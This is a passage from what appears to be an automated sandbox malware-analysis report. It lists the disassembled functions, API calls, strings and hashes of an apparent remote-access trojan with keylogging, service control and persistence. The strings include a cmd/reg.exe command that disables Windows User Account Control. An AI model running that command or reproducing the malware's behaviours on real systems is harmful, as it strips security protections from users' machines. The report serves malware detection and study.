                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                        • String ID:
                                                                                        • API String ID: 221034970-0
                                                                                        • Opcode ID: 966b63bd912de40b5b615a00da15e5d8939a9a4c78db0212e4922df61029cb32
                                                                                        • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                                                                        • Opcode Fuzzy Hash: 966b63bd912de40b5b615a00da15e5d8939a9a4c78db0212e4922df61029cb32
                                                                                        • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                                                                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                        • String ID:
                                                                                        • API String ID: 221034970-0
                                                                                        • Opcode ID: 881ec567a8ecab9b5ae46dea35bb7569396cf57d6f42af84948da6ead9762d9b
                                                                                        • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                                                                        • Opcode Fuzzy Hash: 881ec567a8ecab9b5ae46dea35bb7569396cf57d6f42af84948da6ead9762d9b
                                                                                        • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                                                                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                        • String ID:
                                                                                        • API String ID: 221034970-0
                                                                                        • Opcode ID: 88b0ec0b9de38ee72874faffadaad7a58cf941c8d18bd5a35ca229f780ffab3e
                                                                                        • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                                                                        • Opcode Fuzzy Hash: 88b0ec0b9de38ee72874faffadaad7a58cf941c8d18bd5a35ca229f780ffab3e
                                                                                        • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00442801 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PkGNG
                                                                                        • API String ID: 0-263838557
                                                                                        • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                                                        • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                                                                        • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                                                        • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00404CC3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121synchronizationthreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                                        • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404DD2
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00404DDB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                        • String ID: PkGNG
                                                                                        • API String ID: 3360349984-263838557
                                                                                        • Opcode ID: da9b55f167a3d17e97016713e4b8b3caaa4e9716ac3efc00888ec9c07983d3ee
                                                                                        • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                                                                        • Opcode Fuzzy Hash: da9b55f167a3d17e97016713e4b8b3caaa4e9716ac3efc00888ec9c07983d3ee
                                                                                        • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040B164 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                                                                        • wsprintfW.USER32 ref: 0040B1F3
                                                                                          • Part of subcall function 0040A636: SetEvent.KERNEL32(00000000,?,00000000,0040B20A,00000000), ref: 0040A662
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: EventLocalTimewsprintf
                                                                                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                        • API String ID: 1497725170-248792730
                                                                                        • Opcode ID: 8041cec816ab2e246b71a5493a2e7e61b0e1b04a10b028702d09a00a2ad25ebb
                                                                                        • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                                                                        • Opcode Fuzzy Hash: 8041cec816ab2e246b71a5493a2e7e61b0e1b04a10b028702d09a00a2ad25ebb
                                                                                        • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040A675 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                                                        • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateHandleSizeSleep
                                                                                        • String ID: XQG
                                                                                        • API String ID: 1958988193-3606453820
                                                                                        • Opcode ID: 205b82dffe9b0f77f7c93e78d4092e9a7ef319f9f0d3ec4eb64b3aa0a1bff41f
                                                                                        • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                                                                        • Opcode Fuzzy Hash: 205b82dffe9b0f77f7c93e78d4092e9a7ef319f9f0d3ec4eb64b3aa0a1bff41f
                                                                                        • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegisterClassExA.USER32(00000030), ref: 0041D55B
                                                                                        • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                                                                        • GetLastError.KERNEL32 ref: 0041D580
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ClassCreateErrorLastRegisterWindow
                                                                                        • String ID: 0$MsgWindowClass
                                                                                        • API String ID: 2877667751-2410386613
                                                                                        • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                                                        • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                                                                        • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                                                        • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                                                                        • CloseHandle.KERNEL32(?), ref: 004077AA
                                                                                        • CloseHandle.KERNEL32(?), ref: 004077AF
                                                                                        Strings
                                                                                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                                                                        • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$CreateProcess
                                                                                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                        • API String ID: 2922976086-4183131282
                                                                                        • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                                                        • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                                                                        • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                                                        • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00407260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • Rmc-L24XL1, xrefs: 004076DA
                                                                                        • C:\Users\Public\Libraries\nmfsxfjX.pif, xrefs: 004076C4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: C:\Users\Public\Libraries\nmfsxfjX.pif$Rmc-L24XL1
                                                                                        • API String ID: 0-614935070
                                                                                        • Opcode ID: 1c629e4396ebd3af338879a422fac1621c8df490be40c15e87bc48e2ed270b23
                                                                                        • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                                                                        • Opcode Fuzzy Hash: 1c629e4396ebd3af338879a422fac1621c8df490be40c15e87bc48e2ed270b23
                                                                                        • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                                                                                        • SetEvent.KERNEL32(?), ref: 0040512C
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                                                                                        • CloseHandle.KERNEL32(?), ref: 00405140
                                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                        • String ID: KeepAlive | Disabled
                                                                                        • API String ID: 2993684571-305739064
                                                                                        • Opcode ID: c594fc0502ac089e8ceed4a366586e120d9a374f389bb2b837d8f1f373a196b1
                                                                                        • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                                                                        • Opcode Fuzzy Hash: c594fc0502ac089e8ceed4a366586e120d9a374f389bb2b837d8f1f373a196b1
                                                                                        • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                                                                        • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                                                                                        • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                                                                                        • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                                                                                        Strings
                                                                                        • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                        • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                        • API String ID: 3024135584-2418719853
                                                                                        • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                                                        • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                                                                        • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                                                        • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0044139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                                                                                        • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                                                                        • Opcode Fuzzy Hash: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                                                                                        • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00444CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                                                                        • _free.LIBCMT ref: 00444E06
                                                                                        • _free.LIBCMT ref: 00444E1D
                                                                                        • _free.LIBCMT ref: 00444E3C
                                                                                        • _free.LIBCMT ref: 00444E57
                                                                                        • _free.LIBCMT ref: 00444E6E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free$AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 3033488037-0
                                                                                        • Opcode ID: bc830042460a8b7e4f23ea146b673c7d23acc7bc4933b5c91394f116147f2234
                                                                                        • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                                                                        • Opcode Fuzzy Hash: bc830042460a8b7e4f23ea146b673c7d23acc7bc4933b5c91394f116147f2234
                                                                                        • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00449365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                                                        • _free.LIBCMT ref: 004493BD
                                                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                        • _free.LIBCMT ref: 00449589
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                        • String ID:
                                                                                        • API String ID: 1286116820-0
                                                                                        • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                                                                        • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                                                                        • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                                                                        • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                                          • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                                                                          • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                                                                          • Part of subcall function 0041BFE5: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C005
                                                                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
